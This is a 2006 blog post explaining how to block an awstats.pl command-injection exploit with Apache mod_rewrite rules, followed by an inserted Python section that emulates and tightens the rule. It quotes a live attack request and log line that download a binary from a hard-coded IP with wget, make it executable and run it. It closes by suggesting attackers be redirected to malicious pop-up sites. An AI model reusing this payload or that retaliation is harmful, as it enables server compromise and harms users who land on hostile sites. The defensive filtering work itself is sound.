Battles with mod_rewrite



Ok - so I have been having some troubles with apache and people trying to do nefarious stuff via exploits.

I figured, no problem, I will just add a line to the mod_rewrite config. But, the problem is that I couldn't quite understand the damn thing and it seemed everyone was using the exact same friggin example! How to make your URLs prettier, or how to redirect from one directory path to another. ARRG! BORING!

Why do we let computer majors author documentation? Everyone knows that these folks have zero people skills - so how could they possibly express something in an understandable manner? And yes, I put myself in that group.

SO I will attempt it here.

First, you have to understand regular expressions - and what I don't know about regular expressions could fill a book. Listen, all I wanted to do was to use a simple mod_rewrite block which would look to see if the choad issuing a request against my server was using any of a number of known 'terms' like:
configdir
echo
cmd
you get the drill.

I couldn't find anything to explain how to do this. My problem was that I was trying to use the %{REQUEST_URI} variable. You can't use this for that purpose. See, this variable holds only the path part of the request - it stops at the '?' and never sees the query string. If someone is trying to exploit your system, they are probably using something like this:

/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|

The %{REQUEST_URI} variable ends at
/cgi-bin/awstats.pl

What you need to use is the %{THE_REQUEST} variable. This variable holds the full HTTP request line - the quoted part of a log entry like this one - query string and all:

202.143.143.226 - - [10/Jan/2006:19:21:13 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 200 788 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


From here you can write the rewrite block that blocks the request


# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ - [F]

This block checks the entire request line for the string "echo" anywhere in it and then returns a FORBIDDEN (HTTP 403) page to the requesting host.
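To make the REQUEST_URI versus THE_REQUEST point concrete, here is an added Python example (my own code, not part of the original post or of Apache) that takes the log line quoted above, derives the three mod_rewrite variables %{THE_REQUEST}, %{REQUEST_URI} and %{QUERY_STRING} from it, and emulates a RewriteCond as an unanchored regex search the way mod_rewrite evaluates it. The helper names (rewrite_vars, rewrite_cond, decide), the BENIGN_LINE log entry and the TIGHT_PATTERN regex are all constructed for this example and are not on the page. It also shows the caveat a defender would want: a bare "echo" against THE_REQUEST also forbids a harmless page whose path merely contains those letters, while matching the decoded query string for configdir= followed by one of the listed commands fires only on the awstats abuse.

```python
import re
from urllib.parse import urlsplit, unquote

# The access-log line quoted in the post, re-joined onto one line.
ATTACK_LINE = (
    '202.143.143.226 - - [10/Jan/2006:19:21:13 -0500] "GET /cgi-bin/awstats.pl?configdir='
    '|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx'
    '%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 200 788 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
)

# A constructed, harmless request whose path happens to contain the letters "echo".
BENIGN_LINE = (
    '10.0.0.5 - - [10/Jan/2006:19:30:00 -0500] "GET /blog/echoes-of-war?page=2 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"'
)

# Tighter pattern (an assumption of this example): only fire when the awstats
# configdir parameter is followed by one of the shell commands the post lists.
TIGHT_PATTERN = r"configdir=.*(echo|wget|chmod)"


def rewrite_vars(log_line):
    """Split a Combined-format log line into the three mod_rewrite variables
    the post compares: %{THE_REQUEST}, %{REQUEST_URI} and %{QUERY_STRING}."""
    m = re.search(r'"([A-Z]+) (\S+) (HTTP/\d\.\d)"', log_line)
    if m is None:
        raise ValueError("no request line found in log entry")
    method, target, proto = m.groups()
    parts = urlsplit(target)
    return {
        # The raw request line, exactly as the client sent it (still percent-encoded).
        "THE_REQUEST": f"{method} {target} {proto}",
        # Only the path: everything after '?' is gone, which is why the post's
        # first attempt never matched.
        "REQUEST_URI": parts.path,
        # The part after '?', which is where the injected commands live.
        "QUERY_STRING": parts.query,
    }


def rewrite_cond(value, pattern, nocase=False):
    """Emulate 'RewriteCond %{VAR} pattern [NC]': an unanchored regex search."""
    flags = re.IGNORECASE if nocase else 0
    return re.search(pattern, value, flags) is not None


def decide(log_line, pattern, variable="THE_REQUEST", decode=False):
    """Return 403 (what the [F] flag makes Apache send) when the condition
    matches, else 200. decode=True tests the percent-decoded value so that
    encoded spellings of a keyword are matched as well."""
    value = rewrite_vars(log_line)[variable]
    if decode:
        value = unquote(value)
    return 403 if rewrite_cond(value, pattern, nocase=True) else 200


if __name__ == "__main__":
    for name, line in (("attack", ATTACK_LINE), ("benign", BENIGN_LINE)):
        v = rewrite_vars(line)
        print(name, "REQUEST_URI matches 'echo':", rewrite_cond(v["REQUEST_URI"], "echo"))
        print(name, "THE_REQUEST matches 'echo':", rewrite_cond(v["THE_REQUEST"], "echo"))
        print(name, "tightened rule on QUERY_STRING ->",
              decide(line, TIGHT_PATTERN, "QUERY_STRING", decode=True))
```

In Apache terms the tightened check is `RewriteCond %{QUERY_STRING} configdir=.*(echo|wget|chmod) [NC]` with the same `RewriteRule ^.*$ - [F]` after it; %{QUERY_STRING} is a real mod_rewrite variable, and [NC] is what makes the match case-insensitive, which the post's bare "echo" condition is not.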

If you want to be really sneaky - why not keep a list of websites that fill your system with evil cookies and re-direct your visitor there? Perhaps one of those great porn sites that crush a system with pop-ups. To do that you simply modify the last line of the block:

# Attacker using exploit
RewriteCond %{THE_REQUEST} echo
RewriteRule ^.*$ http://url-to-evil-porn-site-here

And off that surfer goes to the evil pop-up birthing, system crushing website.

Happy redirecting!

Posted: Tue - January 10, 2006 at 09:41 PM